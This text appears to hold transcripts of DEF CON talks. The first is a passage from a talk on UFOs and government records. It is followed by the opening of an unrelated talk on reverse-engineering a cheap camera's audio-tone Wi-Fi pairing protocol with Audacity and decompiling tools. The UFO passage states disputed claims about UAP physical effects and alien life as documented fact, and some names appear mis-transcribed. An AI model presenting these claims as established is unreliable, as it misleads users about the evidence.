they're not Russian or Chinese or from this planet, the only other explanation, however you frame it, is they're off-world. Now, the report did call that last category "other," if you like, but we know what they mean, right? Wink, wink. Other indeed. So where are we? We're back to the Twining memo. And we are back to what we were saying about this in public in the early 1950s. I'm going to pause this and get a map that is on one of the slides and show it to you so you can see what I mean. Okay, I'm back, and here is a map that was in Look magazine in 1952, when there was a lot of activity going on capturing everyone's attention. What you're seeing is a map of the United States, and those circles and names are all of the military bases where UFOs were reported by the government. Got it? You can find this map in more detail on the web if you look up the article, Look magazine, 1952, UFOs, and see the entire article. It's at Jan Aldrich's Project 1947 website. So that's what was happening, and the Twining memo to which I referred was happening. The Twining memo, if you do not remember it from your UFO studies, was written in 1947, and it was from Lieutenant General Nathan Twining to Brigadier General George Schulgen, about flying discs, and he said: the phenomenon reported is something real. It is not visionary or fictitious.
The reported operating characteristics, such as extreme rates of climb, maneuverability, and action which must be considered evasive when sighted by friendly aircraft and radar, this is all confirmed by multiple witnesses. That was 1947. So that's happening too: what we said and knew in 1947 is being said again as if it is new, because it is the authoritative voice making the statement. Now, one of our colleagues and researchers, Barry Greenwood, co-author of Clear Intent, which is the term the CIA used to characterize UFOs prodding the defenses at military sites along the northern tier, shared my surprise at the glum responses to the government report, because there's some real gold there. The report notes that they're physical objects. Back in the 1950s, if you tried to look up flying saucer, which was a phrase that didn't exist yet, in the Reader's Guide to Periodical Literature, which documented all popular articles, you didn't find flying saucer or UFO. You found hoaxes and delusions. Well, things have changed, because the report disclosed for the first time that those unusual flight characteristics to which Twining referred all those years ago have been documented by multiple sensors, including radar, infrared, electro-optical, weapon seekers, and of course visual observation. And the report confirmed that they constitute a flight risk. The report mentioned 11 near-misses, although one of our colleagues, Richard Haines, has been gathering accounts of such encounters from commercial pilots and military pilots and had amassed in his catalog, as of some years ago, more than 3,000 reports from them. So the report said that, far from getting out of the business of studying UFOs, which they claimed to have done after the Condon Committee report and the end of Project Blue Book, theoretically, the government has been keenly interested in UFOs, particularly when they're poking around military bases. And very soon after the report was released, Kathleen Hicks, Deputy Secretary of Defense, issued a memo for senior Pentagon leadership, commanders of combatant commands, and defense agency and DOD field activity directors to institute synchronized collection, reporting, and analysis of UAP, to secure test and training ranges, and essentially to create a new infrastructure for this activity. So that's some of what's happening now. But isn't it interesting that all these things are being reported, including these latest videos, without any context at all? No historical context. But there is, as I am saying, a historical context. And the researchers to whom I have referred, and others, have tirelessly documented for decades a great deal of what that historical context is. And we use data that's in the public domain. Open source intelligence is frequently much more helpful than trying to ferret out compartmented, limited information. So let's look at what is really happening. Now this is where I would show you the slide of the cover of our book, UFOs and Government: A Historical Inquiry. The main authors are Professor Michael Swords, Professor of History, and the former head of the chemistry department at AMD, the chip maker, Robert Powell, who now heads up SCU, which is a scientific organization dedicated to really good analysis of these current cases. Well, our book had nearly 1,000 footnotes, and they all pointed to government documents and other primary sources. So we can tell the story of those decades in the government's own words.
I highly recommend it, of course, as required reading to begin to understand the context of what is being released now without any context at all. Because it was long ago that, for example, J. Edgar Hoover said in 1947, the flying saucer situation is not all imaginary. Something is flying around. And I've already quoted from the Twining memo. Well, there's a ton more. I'm looking over here to see what time it is. And yeah, okay, we're good. There's a ton more of all that to adduce. But let's go beyond the fact of UFOs, the fact that they exist, the fact that they've been documented, to just name some of the documented impacts of UFOs. Here are some of the well-documented effects of which we know. Within a variety of contexts, the emanation of microwave energy from UAPs has been deduced. And UAPs have shown themselves capable of stimulating colored halos around themselves, largely from the noble gases in the atmosphere, in other words, the ionized nitrogen. And that causes the colors that are seen in relationship to the speed they go, which is determined by the power that they use, however they manufacture it. So when they hover, they're red or red-orange. But as they accelerate, they go through other colors until they wind up going through yellow, green, and all the way to white and blue-white. And at the fastest speeds, they are a very, very intense blue-white. All of that relates very mathematically, very directly to the ionization of elements in the atmosphere around them. They have been documented to produce a dazzling white plasma on their surfaces, which is somewhat similar to ball lightning. They induce chemical changes in their presence, and these are detected as odors. They have, numerous times, turned off automobile headlights or engines by increasing the resistance of tungsten filaments. They have stopped internal combustion engines by increasing the resistance of the distributor points and suppressing the current in their primary windings. They have precipitated, numerous times, on planes and on the ground, wild gyrations of compasses and magnetic speedometers, and rattled metallic road signs, which shake just like in the movie Close Encounters of the Third Kind. They have heated up automobile batteries by direct absorption of energy in the acid, and they have interfered with radio and television reception and transmission by inducing extraneous voltages in the coil of the tuned circuit or restricting the emission of electrons from tungsten cathodes. They have disrupted transmission of electrical power by induced operation of isolation relays. They have desiccated small ponds and dried grass and bushes in the ground by resonant absorption of water molecules. They have charred or calcined grass roots, insects, and wooden objects at landing sites. In other words, they leave burnt circles. They have heated bituminous highways in depth, igniting volatile gases. They have heated the human body internally, as microwaves do. They have caused people to feel electric shocks, and they have induced temporary paralysis in witnesses; there are numerous reports, all over the world and through time, of moving toward a landed UFO or a hovering UFO and suddenly being unable to move, being conscious, volitional, but unable to move.
In addition, medical experiments have shown that when pulsed at a low audio frequency, the energy they emit was capable of stimulating the auditory nerve directly, so that people have a sensation of hearing a humming or buzzing sound. Okay, that's the end of that list. Those are the effects, and some of the causes of them, of which we have known for a long time. And then there were incidents long ago, again back to 1952. I'm going to read this one directly. At a distance of 130 miles to the northeast of Washington, D.C., three different Army radar units detected an object at 18,000 feet. The signal was strong. It remained stationary on radar for 30 minutes and then began to move. By the time it reached the edge of the radar scopes, it was traveling over 1,000 miles per hour. The report went all the way to the Pentagon, and the order came back that if another one came in, fire on it. After that first night, we loaded our 90-millimeter anti-aircraft guns, a rather unusual thing to do in a populated area, Washington, D.C., right? And we also scrambled F-94 jet fighters from McGuire Air Force Base. This was the time when Major General John Samford, who was Chief of Air Force Intelligence, said, credible people have seen incredible things. Well, my slides have a few other details that you might want to investigate on your own: the RB-47 case and the Minot URL, the Minot case as illuminated online by Tom Tulien, another colleague. The RB-47 bomber was paced for hours by a UFO; aircraft and ground radar and visual observation confirmed the event. You can find the details of how an explorer like Brad Sparks pursued the reality behind the reported effects. He wrote an article for the wonderful UFO Encyclopedia, the latest edition of which, by Jerome Clark, is just golden. And you can see Brad Sparks' article in the UFO Encyclopedia. Or you can go online to www.minotb52ufo.com and see how Tom Tulien has provided details of the Minot intrusion at Minot Air Force Base, including detailed interviews with pilots, what they saw, what they said. This is a good place to start. Or you can look at the Loring Air Force Base case from October of 1975. FOIA turned up 24 documents describing a B-52 bomber crew on the ground observing an object 300 feet away and 5 feet above the ground at that military installation. Or you can look at the document we received from the DIA by a FOIA request about the incident in Tehran, Iran, in September of 1976, which details a dogfight between fighters and the UFO. An Iranian general later spoke publicly at a press conference confirming the event, and the report from the DIA says the case is of the highest credibility. I'm referring you to all these cases because that's where you have to go if you want to know the context and the depth and the details of how this phenomenon has manifested itself over so many years. Cases, cases, cases. Read them. Mike Swords, our lead professor, said, I believe no one can be a good student of ufology unless one reads lots of cases. Cases are all we've got. Read them. Read them. Read them.
You don't need 10,000 hours of case reading to do that, but you do need a lot of hours because there are so many cases and you begin to evaluate which ones you don't even want to read. You prefer two witnesses or more, not single witness cases. You don't worry about lights in the sky, period, as if that's all UFOs are. Read the cases. Read them. Read them. Read them. Now, one of the things that happens during these encounters is there's something that we call strangeness because we don't know what else to call it. People do report missing time, which can be caused by a number of things or finding yourself becoming conscious and far from where you had been when the encounter began, or you were traveling a busy road, there were sounds of traffic, or there were outdoor nature sounds, birds and insects, and suddenly there's silence. It's like being in a bell jar. We don't know what's happening. Is it a warping of space time somehow, or is it the impact of the phenomena on human consciousness? Because ultimately the impact of all of this on human consciousness, individual as well as societal, is where we have to go because that's how it comes home to us. That's how it's important. Are there patterns? Well, you look for them, but if there are patterns, they seem designed to confuse us. You can't say that's clearly the intention or certainly the intention, but they seem to act like deception operations because we can't identify an easy pattern, except I think there's one that is incontrovertible. All of the intermittent reinforcement of UFO encounters over the past years has resulted in all of us knowing about UFOs. In other words, they were hoaxes and delusions 70 years ago. Now they're UAPs. We all know how to draw UFO. Not all the UFOs are looked the same, but you know what I mean. You know what a classic UFO looks like. Prolonged exposure to intermittent reinforcement from manifestations in remote places, unusual places often and impossible to predict places, has sensitized us to the fact of their existence and presence, and has alerted us to the possibility and expectation of meaningful contact. We don't call them meant for Mars anymore. So it's important to look at the cases. It's important to grasp what you can from them, but it's important to understand that if you haven't done some of the homework and looked at the cases, we have amassed. Go to Project 1947 website, the Jan Allrich is done. Look at the Project Blue Book website. Look at all the work that we have done over 50 years of gathering documents. Barry Greenwood, to whom I referred, I think the last time he counted, he had 250,000 clippings on UFOs. It does help in this domain as in many others to be obsessive and compulsive, because that produces results. It's a feature. It's not a bug. Well, are we the only ones concerned? No, I don't think so. China created the government-sponsored China UFO Research Organization, or CURO, under their Academy of Social Sciences to study UFOs or UAPs. There is a People Liberation Army task force dedicated to unknown objects that increasingly relies on AI technology to analyze its data. Of course, we're not the only one interested. If there's a security implication, and if whoever susses out the sources of propulsion and maneuverability gets to it first, they own us. They own the planet, as indeed whatever is behind this phenomena has made clear, as Vrindavan Ram said many years ago, we're up against something that is far superior technology to what we thought. 
Well, China, in effect, by creating their own investigations, as we know Russia has done at one time, and others as well, they're really kind of saying what Jenny Randles tells us. J. Allen Hynek, the astronomer associated with Project Blue Book as an Air Force consultant, said that when he was at the Pentagon a general took him aside and said, Allen, do you really think we would ignore something like this? Well, no, no. We don't think they have ignored it. And that's why we know this report is just the tip of the iceberg. It refers to 100-some-odd events recently. But knowing all that, knowing them, has had a powerful impact on people over the years. And it does impact how you think it's right or best to report out things that originally were unthinkable. Well, now, with the authoritative voice speaking, so the rest of us who've been speaking for years can be heard, it's not unthinkable. It's more than thinkable. It's known. And some of the effects of knowing something can be so impactful, so traumatic, that it can mean a major restructuring of how we think. It can mean a major restructuring of society hierarchically, so that the pieces that we put together into how we believe we ought to operate will fundamentally change, knowing we, let's say, are not alone and are not the top of the food chain. Belief systems will stretch to accommodate new data. You know, the Roman Catholic Church said, no problem if aliens are real. We'll just baptize them. That's a belief system stretching to accommodate new data. Or sometimes people double down on their original beliefs. You know that. The more something is shown to be incorrect, the more people assert it to be true. The political situation is testimony to that. And when I've been giving speeches on this, or on intelligence matters, or things that are a challenge for people, I often hear someone say, I don't want to know that. I don't want to live in your world. Well, that's a choice people make: to hunker down in their bubble, play golf, do whatever they do to distract themselves from what's a little more important than making par. I don't want to know that. Well, I've heard that enough to know that I do want to know it. I'm a need-to-know machine. I'm a curiosity machine, and curiosity is generally considered to be a good thing, a sign of intelligence. Although when I was doing a talk at Los Alamos and I was asking questions about their supercomputers, the respondent, who didn't say much, said, you know, curiosity is considered a good thing elsewhere. In here it's not. In other words, shut up. Well, how is this impacting people? Just ask Bill Nelson, who's now the head of NASA. He said that when he was serving in the Senate, he saw classified UAP data. Now, keep in mind that the report we've seen is seven pages, and we are told that there were 70 pages and the rest was all classified. So we don't know what was in there, other than that there were more details and more reports. Well, Nelson said when he heard the reports, quote, the hair stood up on the back of my neck. He said he also spoke with some of the pilots involved in the incidents, and he said they know they saw something. Well, the point of that is, when the head of NASA, a former senator, hears a classified briefing and reports that the hair stood up on the back of his neck, it makes the hair stand up on the back of our necks, because it adds to the implications of what we're discussing: the unknowns of what he did hear, and what we do know on top of what we have been able to fathom. So why would he say that?
What else is not being said? How many classified pages of the report were not put out to the public? Well, we have hints right from the senators who heard it. Mark Warner, the chairman of the Senate Intelligence Committee, said he was first briefed on UAPs nearly three years ago, long before 60 Minutes did their little piece, and since then, he said, the frequency of these incidents only appears to be increasing. Today's inconclusive report is the beginning of efforts to understand and illuminate what is causing these risks to aviation in many areas around the country and the world. Marco Rubio, senator and vice chair of the Intelligence Committee, said: for years the men and women we trust to defend our country reported encounters with unidentified aircraft that had superior capabilities, and for years their concerns were often ignored and ridiculed. This report is an important first step to catalog these incidents, but it is just a first step. We have endured ridicule from these authoritative voices for decades. I've said before: illusion, misdirection, ridicule. These are the three legs of the stool of cover and deception, and they are used effectively by agencies which have resources so extensive that the normal human cannot imagine them. Ridicule. Lawyers hold seminars on how to ridicule a witness, to completely undermine their credibility so that nothing they subsequently say, even though it's the truth, matters. Those of us who have pursued information about this for all these years know the effects of ridicule. Well, what is the way forward? What are we going to do? Whether or not the military pursues UFOs in earnest, there has to be a civilian program. The military from the first has focused on the threat to security, but a civilian program can do science. Civilians, not just the military, do science, and what UFOs really are, what they constitute, remains a scientific problem. It's not just a question of intelligence or counterintelligence. We need a study well designed to develop a strategy to test our hypotheses about what they are and to distinguish among the different UAPs. This comes from Mark Rodeghier, who is the head of CUFOS, the Center for UFO Studies. Mark is a very bright guy; he has worked in that area for decades and has shared the frustration of not seeing the science supported that would enable us to do this. I mentioned SCU, you can look it up, and Robert Powell, my colleague and co-author of UFOs and Government. They have done analyses of recent incidents, including the ones we're talking about here, that are scientific, that use teams of scientists, and that only report out, in up-to-200-page reports, what they can verify is scientifically feasible and well documented. They approach it as a scientific problem, and this is in contrast to how so many in the cottage industry of UFOites have pursued the problem, which is by hearsay, their own misinformation, because they don't know what they don't know or what they do know, and their disinformation, sometimes sponsored and intentionally designed. So it has to be a scientific problem for us to address in scientific ways. UFOs constitute an existential threat. It could be a threat to security in general. The technology is something we don't know how to do, and you know the analogies: go back 200 years and describe cities aglow with electric lights and you'll sound like an idiot.
The history of science is replete with the resistance humans mount against the truth when it threatens their belief systems, and a superior technology like this invites disbelief and rebuffing it by saying, oh, that can't be true. But any time I find myself saying that can't be true, I find it really pays to explore a little more. Don't forget that Richard Feynman said the keystone of advances in science is a fact that is also anomalous, because it contradicts the belief system in which it doesn't fit. It has to be both. It has to be a fact. It can't be a non-fact. And it has to be an anomaly. It has to be something that doesn't fit, because then it prompts the question: well, if this is real, if this is true, if this is a fact, where does it lead us? What else must be true? If these reports all these years have been true, what does it tell us about cover and deception operations? What does it tell us about how different government units operate, as we document in our book? There's no one government. There are multiple government sectors, and they're often at odds with each other, just as in the intelligence agencies, a couple of dozen of them, people are often pursuing a goal but are also very much at odds with one another as well. Now, the security question is real, because if one of our terrestrial adversaries figures it out first, we're toast, right? We're toast. Every major military advance, from stirrups to bullets to guns, on and on, has given insurmountable advantage to the one who got to it first. It's an existential threat too, because it's a challenge to our societal beliefs. It's a challenge to our cultures and it's a challenge to our religions. Our religions are extraordinarily resilient, as we know. We continue to affirm religions formulated in the scientific worldview of 2,000 years ago and successfully compartmentalize what we choose to ignore and what we choose to try to continue to affirm. But there does come a tilt. There does come a turning point, which is why church attendance is so far down in America, where people listen to nonsense and just can't stand it any longer. I'm not saying religions are nonsensical. I'm saying they become the excuse to say things which, in the rest of your life, you know you don't believe, and you don't act on those things you say; you act on your true beliefs. Well, a challenge to those beliefs, a challenge to those beliefs all the way up to the level of cultural linchpins, is a serious existential threat. And then of course there's the unknown. How do we deal with the vast unknown, and with realizing how tiny we are, our galactic cluster, billions of galaxies with billions of planets in them? We know the universe is teeming with life. Easy to dismiss: oh, where are they then? As if they should all be clamoring for our attention. Right? Like I want my ant farm to pay attention when I walk into the room. It's not happening that way, for good reason. We're not the top of the food chain, and if we're the apple of God's eye, we're discovering that there are millions of apples on those very big trees, and as God loves all his apples, we're just one apple. It's always a challenge when we have siblings and we find out our parents love them too. Right? Or as much as they love us. So what did make the hair on the back of his neck stand up? We want to know. For him it was a challenge and a shock.
I went through that myself years ago when I first got into this domain and began hearing credible reports from fighter pilots, people in intelligence, people in the military, and just plain people who wanted to talk about what they'd experienced but whom the authoritative voices had prevented from speaking out loud, lest they be told they were drunk or crazy or ridiculed in other ways. The time for that kind of nonsensical ridicule is over. This domain has had debunkers, not skeptics. Those of us who pursue the truth of this have been skeptical in the extreme; it's valuable in a scientific consciousness. Debunkers are people who, like committed atheists, say no, no, no the way committed believers say yes, yes, yes. They're just as committed to no as a believer is to yes, and just as foolishly wedded to their commitment, which is based on emotional grounds, not on the rational grounds they put forth as the reasons they believe what they believe. Where are the debunkers now? When it's not us, investigators on our own, who are advocating for the reality of the phenomena, but the authoritative voices at all levels? Well, they're pretty quiet, aren't they? Where are the SETI people like Seth Shostak, who's been debunking us with superior smirking for years? He's flailing about in the weeds, because he would have an awful lot more to attack than the straw men and women SETI has invented in the pretense that their approach to discovering extraterrestrial life makes any sense at all. Well, I guess I'm going to wind it up here by making a pitch for intelligence, clarity, passion, commitment, and a radical willingness to open yourself to wherever the facts and the truth may lead. And today that's a difficult thing. The last slide has a picture of my latest book. I get to pitch it, right? Mobius: A Memoir. 25 years of my experience working with security and intelligence professionals has finally poured into a single narrative. And it's a novel because, as I often say, a deputy director at the National Security Agency said, you can't talk about what we talk about with you. You have to write fiction. Fiction is the only way you can now tell the truth. He was right. Well, 37 published short stories and now two novels later, Mobius: A Memoir is the most truth I can tell in a narrative that's coherent, artful, and includes that quarter century of deep listening to my colleagues. I encourage you to take a look at it. And soon, if it's not there now, it will be at the Internet Archive as a borrowable download in digital form, one at a time, as the rules go. But you can of course buy it in Kindle or print at a very reasonable price. Check out my website for it. I'm going to repeat that: https://, which we don't have to say anymore, thiemeworks, t-h-i-e-m-e-w-o-r-k-s, dot com. Once more, it has been a terrific privilege and a pleasure to be part of DEF CON 25 years after I first spoke here, because this has been my home conference, a place where I'd never had to explain who I was, because we all get it. We get who each other is, straight up. And that's why we come back. So thank you for the invitation. Thank you for listening. And thank you for being committed to exploring the system in all its complexity and intricacy so you can take it apart and put it back together again in a way that works better. Thank you.
|
The talk, "UFOs and Government: A Historical Inquiry" given at Def Con 21 has been viewed thousands of times. It was a serious well-documented exploration of the UFO subject based on Thieme's participation in research into the subject with colleagues. The book of that name is the gold standard for historical research into the subject and is in 100+ university libraries. This update was necessitated by recent UFO incidents and the diverse conversations triggered by them. Contextual understanding is needed to evaluate current reports from pilots and naval personnel, statements from senators and Pentagon personnel, and indeed, all the input from journalists who are often unfamiliar with the field and the real history of documented UFOs over the past 70 years. Thieme was privileged to participate with scholars and lifelong researchers into the massive trove of reports. We estimate that 95% can be explained by mundane phenomena but the remainder suggest prolonged interaction with our planetary society over a long period. Thieme also knows that when you know you don't know something, don't suggest that you do. Stay with the facts, stay with the data. Sensible conclusions, when we do that, are astonishing enough. Reality, as Philip K. Dick said, will not go away just because we refuse to believe in it.
|
10.5446/54231 (DOI)
|
Hi, my name is Ryan Carter, and today I'll be presenting on why my security camera screams like a banshee, a talk on signal analysis and reverse engineering of an audio encoding protocol. A little bit about myself: I'm a software developer and security engineer. I love to code, love to automate, love to solve problems. I like to employ the hacker mindset and break things in cool and unexpected ways, to learn more about the system and hopefully drive an improvement that makes it better for everybody. I love food, love cooking, love baking; recipe hacking is a passion of mine, and when I can get a delicious result, it really makes my day. And then of course the standard disclaimer applies here: all opinions are my own and don't reflect the positions or thoughts of anybody else or any current or previous employer. So let's get to it. I've got a few different sections to cover. We're going to touch on what it is that we're actually doing here, the signal analysis piece, application analysis, hacking the signal, and if all goes well, we'll get to a demo. So what are we doing here, and why are we talking about wireless security cameras? My original goal, before I even had the idea to submit a DEF CON talk, was to use an inexpensive wireless camera to monitor my garden. And this is the inexpensive camera I selected. It's got an antenna and is suitable for outdoor use. This one's kind of interesting in that it has a microphone and a speaker, so you could have two-way communication if you wanted it. And the nice thing about this is that it was cheap, and it seemed like it would do the job. This sounds fairly easy and straightforward, so what's the catch here? I discovered, after purchasing the camera, unboxing it, and examining it, that it requires a cloud application in order to enable and pair the camera. There's no way to self-set-up the camera: there's no ad hoc wireless network, it doesn't show up with a Bluetooth connection, and when you plug in the USB cable, there are no signals there whatsoever. Also, there's no documentation online about this camera to any real technical depth, not that I was expecting much from a $30 camera. And then of course what brings us here today is the bespoke protocol that it uses, or rather that the vendor application uses, to communicate with and configure the wireless camera. So take a listen to this. This is what really piqued my interest and set me down the path of trying to do a DEF CON presentation. So that's the sound that this vendor application makes to interface with the camera and configure it to connect to a wireless network. I have to say I was not expecting that. It's not usually how you configure things like security cameras. So my goal, after finding out that it uses a sound wave signal to configure the camera, is to find out what was going on during the camera setup and see if I can't hack on it and replicate it, and if possible cast off the shackles of the proprietary cloud-enabled app that the vendor supplies. So let's investigate. The first thing you want to investigate is the hardware. And as I mentioned before, it does have a USB cable. This connector, though, only supplies power; when I traced the leads there was no activity on the data pins. Other investigative angles, of course: check for Bluetooth, check for ad hoc Wi-Fi. And unfortunately, after many hours of trying all sorts of different permutations of things (pressing the reset button, holding the reset button, scanning with wireless scanners, etc.), nothing was advertising.
So that left me to investigate the software in a little bit more detail. This is the vendor application that comes with the camera. It's called Java, and it's used to configure the cloud camera. However, like I mentioned before, I wasn't really a fan of having to use this proprietary, cloud-locked application. Java requires an internet connection, and it also requires a username and password to be configured with this cloud setup. So that made me a little frustrated and incentivized me to poke around some more. Now, in order to analyze the vendor application, I needed a test device. I didn't want to run this on my primary phone, just being the security-paranoid person that I am. I don't really have a lot of trust for applications that come from dubious sources, like the manufacturer of a $30 cloud-enabled camera. And as I searched online for information either about the camera or the application, it's probably not too surprising to hear that there weren't many, if any, results to be found. I did uncover a few other camera models that seemed to use the same audio-wave-signal approach to configure the camera for a Wi-Fi network. I don't have any of those, though, and I just list them here as an interesting aside. There are some cheap cameras, though, which leverage, in my opinion, a far superior approach to pairing the camera to a wireless network, and that's having the app show a QR code that you then scan with the camera. The camera has, well, a camera, and scanning a QR code is a fairly straightforward thing to do in 2021. So I doubt, or I should say I wonder, if there'll be many, if any, more cameras out there which leverage this audio-encoded approach. So now that we've taken a quick pass at the hardware and the software, let's think about this signal a little bit more and see what we can identify and figure out. And along the way, let's think about some things that we can look for as we analyze this signal. Of course, the first thing is we'll want to capture and visualize the signal. We'll be looking for things like repetition, variation, and replay. And if possible, we'll try to fuzz and simulate the signal in a way that can hopefully track with a valid encoding. This is the raw view of the signal as captured by Audacity and visualized in the spectrographic view. Just taking a quick look at this, it's pretty clear that there are distinct tones and that the signal appears to be stepped. This isn't a continuous waveform that gets transmitted; it's individual tones which are given certain slices of time, transmitted for a certain amount of time, and then other tones are played after that. Taking a look, it seems like a lot of the signals are centering, at least here, around 3500 Hz, with a few outliers on the low end of the frequency range and the high end as well. So this is something worth noting as we go about analyzing the signal. Now let's see. One thing that I thought as I was looking at the signal is: is this similar to a modem signal? It's been an awful long time since I've heard a modem, and obviously modems encode the information they transmit using an audio signal. So I did a quick comparison against a recording of a 56K dial-up modem establishing a connection. Just by looking at these waveforms, it's pretty apparent that it's not a 56K modem.
The spectrographs are substantially different, and this audio protocol that they're using to configure the camera is bespoke in the sense that you can't find information about it easily and it doesn't track with other common audio protocols that you might think of, like modem or fax. So, looking a little closer at this with our eyes, I marked out a few sections that appeared interesting, really just highlighting the signals that appear extraneous or that don't track with what the rest of the signal offers. And on the left of this slide, I put together what I'm calling a collapsed spectrograph view, where I basically took all of the tones, slid them all over to my left, and lined them up to see which tones and frequencies were represented. You can see that it does center around 3500 Hz, there's a small gap above 4000 Hz, and then there appear to be some things at the higher register range. Now, a picture is nice and it helps us understand how the signal is structured, but a picture can only take us so far. We'd like to get more precise and better understand what is actually encoded in this signal and what the protocol is for actually encoding data into the signal. With a manual approach, we can keep using a tool such as Audacity or other audio editing tools that are out there. With Audacity, you can use this functionality called labeling. You position the cursor over each one of those sections where there appears to be a distinct tone, press Ctrl+B, and it will cause Audacity to label that time slice and mark the frequency that's detected at that point in time. You can see just in this picture here (it might be a little small, a little hard to see) that I've got a bunch of labels on each one of these tones. This next view is the Audacity view where you can see the labels that you've taken. You can go to Edit > Labels, and you can export them to a text file, which you could run through some other type of automated analysis, or plug into a spreadsheet, or what have you. Let's take a little closer look at this. You can see that Audacity is mapping a low and a high frequency that it detects at that time slice. These frequencies are a little variable. To me it looks like this puts us in the ballpark for what each of the target tones are. I don't imagine the vendor application is really putting out 5101.89 Hertz; it's probably something a bit more round. We'll figure out more about that as we go along in this process. What do we know now from doing our quick manual analysis? We can see that there is encoding going on. There's a digitized signal, but the signal isn't binary; it's not like it's just two tones, one and zero. There's a range of frequencies represented here, so there's some type of digital encoding going on. The frequencies seem to be centered in the 3-5 kilohertz range. My suspicion is that the signals that are outliers at the top and bottom are control signals, and they warrant a closer look when investigating how the signal is put together. We see that there's repetition: I noticed in my analysis of the vendor application and the pairing tones it produces that the complete sequence repeats itself multiple times, at least three times. Then finally, we can see that this is not a 56K modem or a fax signal; the spectral analyses just do not match. At this point, we have to ask ourselves: is there really much further that we can go in manual mode?
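(As an aside, before answering that: the per-slice frequency measurement that Audacity's labels provide can also be approximated in code. The sketch below is a minimal Java example, not anything from the talk's materials; it assumes a 16-bit mono PCM WAV with a plain 44-byte header, a 44.1 kHz sample rate, and 50 ms slices, and it simply reports the strongest candidate frequency per slice using the Goertzel algorithm.)

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.file.Files;
import java.nio.file.Paths;

// Minimal sketch: report the dominant tone in each 50 ms slice of a WAV capture.
// Assumes 16-bit mono PCM with a plain 44-byte RIFF header; real captures may differ.
public class SliceTones {
    static double goertzel(double[] s, int off, int len, double freq, double rate) {
        double w = 2 * Math.PI * freq / rate, coeff = 2 * Math.cos(w);
        double q0, q1 = 0, q2 = 0;
        for (int i = 0; i < len; i++) { q0 = coeff * q1 - q2 + s[off + i]; q2 = q1; q1 = q0; }
        return q1 * q1 + q2 * q2 - coeff * q1 * q2;   // squared magnitude at freq
    }

    public static void main(String[] args) throws Exception {
        double rate = 44100;                           // assumed sample rate
        byte[] raw = Files.readAllBytes(Paths.get(args[0]));
        ByteBuffer bb = ByteBuffer.wrap(raw, 44, raw.length - 44).order(ByteOrder.LITTLE_ENDIAN);
        double[] samples = new double[(raw.length - 44) / 2];
        for (int i = 0; i < samples.length; i++) samples[i] = bb.getShort();

        int slice = (int) (rate * 0.050);              // roughly 50 ms per tone, per the talk
        for (int off = 0; off + slice <= samples.length; off += slice) {
            double bestF = 0, bestP = 0;
            for (double f = 500; f <= 6000; f += 25) { // search band guessed from the spectrogram
                double p = goertzel(samples, off, slice, f, rate);
                if (p > bestP) { bestP = p; bestF = f; }
            }
            System.out.printf("%6.2fs  ~%5.0f Hz%n", off / rate, bestF);
        }
    }
}
```

The 500 to 6000 Hz search band and the 25 Hz step are guesses based on the spectrogram description; a real tool would read the sample rate and data offset from the WAV header instead of assuming them.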
The answer there is yes, but with a set of caveats. There's variability whenever you play back the audio signal. I found that each time I played back even the same signal from the vendor application, that audacity analysis would slightly vary in terms of which frequencies it shows when you do the labeling process. Of course, manually going through the process of playing a signal from an application, recording it into an audio editor, and doing that over and over again, is very time consuming since the app repeats the same signal multiple times. Then after you get a complete signal captured, you have to wait for the app to finish its full cycle before you can kick off another test permutation. Just to be clear, the only options we have to configure in this vendor application are the SSID and the passphrase for the wireless network. There's not a whole lot of things that you can vary for the input. One thing I noticed is that there's no readily apparent API to leverage the frequency detection portion of audacity. There's no CLI option, there's no readily available API option. While I could have dug deeper into the audacity code base to better understand how that's put together and hook into it, that really wasn't what I was trying to go for. That would be more of an aside as opposed to helping me on my main journey to reverse engineering better understand this audio signal. With manual mode, we can do black box signal reversing, we can try to brute force reproduce the tones, we can attempt to match generated tones with spectrographic views, and then of course just fuzzing, generating permutations until we find a match. This is a very tedious and time consuming process though. I was looking for a better way to leverage what I have and what I know in order to improve this process. Really the next step here is to do an analysis of the Android application since the Android application is what generates the audio signals. Let's take a closer look at this vendor application. How do we go about analysis of an artifact, of a software artifact? We can do things like executing it and logging the results in a sandbox or a test environment. We can decompile the package. We can look for strings, anything that might relate to audio or sound or SSIDs and passwords, things of that nature. We can do a key method search since Android uses a higher level language, at least I should say this APK is written to a higher level language. Even though vendors can obfuscate their code, it's a lot harder to obfuscate the underlying library functions that you use as a vendor. You can do a search for Android system calls or Android libraries that provide methods that you might need when dealing with audio and audio encoding. Once we figure out these code paths, we can attempt to do high-speed fuzzing. Then of course, if we identify something that has been obfuscated, we can try to go and de-obfuscate it and attribute the classes, the methods, the properties, some other identifiers which makes more sense to humans and helps us better reason about the code to really figure out how this all works. Now, let's talk a little bit about preparation. You'll need to prepare your computer to pull the APK off of your test device. If you've worked with Android before, you're probably already familiar with this. 
You need to make sure your developer mode is enabled, that you've allowed USB debugging, make sure that you have Android Studio installed and that version of ADB is correctly placed in your path so that way you can leverage it for the purposes of this. You'll want to extract the Android package. Here I show a few commands that you can use if you want to follow along afterwards and try this. You'll want to make sure that you take the output of each step and feed it into the next step, since what I have here is really only applicable to a BlackBerry priv. This is the test device that I had lying around after all these years to do this analysis on. Once you have the APK, you can use a tool to decompile it. I leveraged a JADX. You can go to the GitHub page, pull the latest release, and then it's a very simple tool to decompile the code, just a quick one-liner. You will probably note that it'll show finished with errors. I found that the errors did not negatively impact my analysis of the package and I was not impeded in my journey. Once you have the decompiled sources, you'll want to open up a new Android Studio project, open the decompiled sources from JADX, and then click a little button in the lower right hand corner that says, configure the Android framework. By configuring the Android framework, it enables you to do things like find usages and go to definition, just all the goodness that you'd expect from a modern IDE. Once it's loaded, you'll see a bunch of classes on the side. The one that I have highlighted there is u.aly, which is clearly obfuscated. As you drill into there, there's a bunch of obfuscated classes and methods. Now a quick note on obfuscated code. What is obfuscation? Sometimes software makers want to hide their implementations. They want to impede you from figuring out how they work and from reverse engineering it to better understand what the underlying mechanisms of its operation are. With higher level languages, you get terse randomly generated identifiers. You might have a class named lowercase a. You might have a method named f999, or whatever the case may be. It's harder to obfuscate the use of system libraries in a higher level language since those decompile cleanly back to base libraries. Why do we use Android Studio? Or what's the advantage of using Android Studio in your manual deobfuscation process? It's a very slick IDE. It's free, readily available. It receives a lot of support. A lot of people use it. Then you get all the classic IDE functionality like find usages, go to declarations, things like that. With Android in particular, you get a logcat instance or logcat window which lets you search. You can also target specific applications that are running on a phone to reduce the verbosity of the messages that you see. It better help you tailor your analysis. Let's take a look at what we can do with this application. Live log analysis. This is one of the first things I try because being a developer myself, I know that oftentimes the debug logs will contain a wealth of information. As a regular user of 